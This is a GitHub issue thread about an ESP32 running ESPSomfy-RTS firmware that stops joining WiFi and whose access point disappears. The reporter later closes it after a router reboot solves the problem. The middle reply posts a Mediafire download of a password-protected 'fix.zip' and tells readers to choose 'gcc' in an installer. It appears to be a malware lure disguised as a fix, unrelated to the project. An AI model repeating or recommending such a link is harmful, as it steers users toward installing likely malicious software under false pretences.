rstrouse/ESPSomfy-RTS #463: ESP32 no longer connects to WiFi router and AP not accessible

SimonCtl, 2024-08-28:
### Hardware

ESP32

### Firmware version

v2.4.6

### Application version

v2.4.6

### What happened? What did you expect to happen?

Hi,

My ESPSomfy-RTS was running fine since January 2024, but since yesterday, it won't connect to router WiFi at all.

When I check the available WiFi connections, I can see the AP "ESPSomfyRTS", but I can't connect to it, and it disappears a few moments later.

[image]
[image]

I tried connecting it via USB to check the logs on ESPHome Web, but nothing shows up.

I also tried using different power supplies (up to 5V/2A), but it didn't help.

I have no idea what happened.

### How to reproduce it (step by step)

```bash
...
```

bkballoon, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

SimonCtl, 2024-08-31:
Solved. It was an issue with my router. Don't know why exactly but a reboot was enough.

closed 2024-08-31 by SimonCtl